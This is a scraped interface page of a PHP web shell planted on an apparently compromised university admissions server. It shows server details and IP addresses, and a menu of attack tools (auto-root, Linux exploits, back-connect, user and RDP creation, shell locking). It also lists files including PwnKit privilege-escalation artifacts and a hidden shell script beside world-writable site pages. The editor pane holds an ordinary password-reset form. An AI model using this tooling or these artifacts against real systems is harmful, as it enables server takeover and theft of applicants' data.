Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.14.249.102
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
bcu /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
meritlist
[ DIR ]
drwxrwxr-x
meritlist_final
[ DIR ]
drwxrwxr-x
meritlist_final_2
[ DIR ]
drwxrwxrwx
other_docs
[ DIR ]
drwxrwxr-x
.bcu.php
3.61
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
1-Year-Fee-Notification-Affila...
518.4
KB
-rwxrwxrwx
1-Year-Fee-Notification-BCU-De...
586.53
KB
-rwxrwxrwx
COURSES_OFFERED_ARTS.pdf
1.69
MB
-rwxrwxrwx
COURSES_OFFERED_ARTS_old.pdf
1.69
MB
-rwxrwxrwx
Eligibility_Criteria_For_Admis...
21.2
MB
-rwxrwxrwx
MainPage.html
52.32
KB
-rwxrwxrwx
PG 3rd round counselling vacan...
5.36
MB
-rwxrwxrwx
PG-admission-notification-for-...
757.44
KB
-rwxrwxrwx
PG_Courses_offered_in_Affiliat...
13.14
MB
-rwxrwxrwx
Scan Dec 8, 2020 (2).pdf
2.74
MB
-rwxrwxrwx
Scan Dec 8, 2020.pdf
1.48
MB
-rwxrwxrwx
add-course-payment.html
692
B
-rwxrwxrwx
add-course.html
1.23
KB
-rwxrwxrwx
app-status.html
3.39
KB
-rwxrwxrwx
dat.json
5.03
KB
-rwxrwxrwx
ent-application.html
87.12
KB
-rwxrwxrwx
ent-application05.10.2020.html
83.65
KB
-rwxrwxrwx
forgotPassword.html
5.11
KB
-rwxrwxrwx
genRankPrio.php
894
B
-rwxrwxrwx
index.html
8.38
KB
-rwxrwxrwx
index_adm.html
5.42
KB
-rwxrwxrwx
instruction.html
10.69
KB
-rwxrwxrwx
login.html
7.22
KB
-rwxrwxrwx
make-payment.html
452
B
-rwxrwxrwx
merit_list.php
2.03
KB
-rwxrwxrwx
merit_list_2.php
1.91
KB
-rwxrwxrwx
merit_list_final.php
1.93
KB
-rw-rw-r--
merit_list_final_2.php
1.96
KB
-rw-rw-r--
mock-seat-allotment.html
608
B
-rwxrwxrwx
option-entry.html
1.54
KB
-rwxrwxrwx
pg-forgotPassword.html
4.1
KB
-rwxrwxrwx
pg-sign-up.html
7.81
KB
-rwxrwxrwx
pg_instruction.html
9.14
KB
-rwxrwxrwx
pgadm.html
67.76
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
seat-allotment.html
1.08
KB
-rwxrwxrwx
seatAllot.php
6.75
KB
-rwxrwxrwx
sign-up.html
7.96
KB
-rwxrwxrwx
support.html
4.76
KB
-rwxrwxrwx
upload_file.php
787
B
-rwxrwxrwx
upload_file_pg.php
746
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pg-forgotPassword.html
<div class="card1" style="min-height: 50vh" id="sign-up-scroll"> <center><p style="color: #fff" class="font-25">Forgot Password</p></center> <div class="body"> <div id="idForgotPasswd"> <form id="forgot_password_Email"> <!-- <div class="input-group"> <span class="input-group-addon"> <i class="material-icons">smartphone</i> </span> <div class="form-line"> <input type="text" id='mobile' class="form-control" name="Mobile" placeholder="Registered Mobile" minlength="10" maxlength="10" required autofocus> </div> </div> --> <div class="inner-addon left-addon m-b-20"> <i class="material-icons">smartphone</i> <input type="text" id="mobile" class="form-control1" name="Mobile" placeholder="Registered Mobile" minlength="10" maxlength="10" required autofocus /> </div> <span id="confirm" class="pull-left p-b-10" style="color: #0087ff"> </span> <div class="row"> <div class="col-xs-4 col-xs-offset-8"> <button id="btn_recover" class="btn bg-blue waves-effect" onclick="recover()" > Send-OTP </button> </div> </div> </form> <form id="resetpasswordform"> <!-- <div class="input-group"> <span class="input-group-addon"> <i class="material-icons">smartphone</i> </span> <div class="form-line"> <input type="text" id='motp' class="form-control" name="Mobile otp" minlength="6" placeholder="OTP" required> </div> </div> --> <div class="inner-addon left-addon m-b-20"> <i class="material-icons">smartphone</i> <input type="text" id="motp" class="form-control1" name="Mobile otp" minlength="6" placeholder="OTP" required /> </div> <div class="inner-addon left-addon m-b-20"> <i class="material-icons">lock</i> <input type="password" id="password" class="form-control1" name="password" minlength="8" placeholder="Password" data-toggle="tooltip" data-placement="top" title="Minimum 8 Characters" maxlength="25" required /> </div> <div class="inner-addon left-addon m-b-20"> <i class="material-icons">lock</i> <input type="password" id="cpassword" class="form-control1" name="confirm" placeholder="Confirm Password" data-toggle="tooltip" data-placement="top" title="Re-Enter Password" maxlength="25" required /> </div> <button class="btn btn-block btn-lg bg-mycol waves-effect" id="confirm-btn" onclick="resetPasswd()" > Reset Password </button> </form> <div class="row m-t-20 m-b--5 align-center"> <a style="color: #fff; font-weight: 800" href="pgindex.html" >Back to Sign In!</a > </div> </div> </div> </div> <!-- <script type="text/javascript"> $('form').submit(false); $('#forgot_password_Email').validate({ highlight: function (input) { $(input).parents('.form-line').addClass('error'); }, unhighlight: function (input) { $(input).parents('.form-line').removeClass('error'); }, errorPlacement: function (error, element) { $(element).parents('.inner-addon').append(error).find("label").css("color", "red"); } }); </script> --> <script src="../js/pg/forgot-password.js"></script>
Close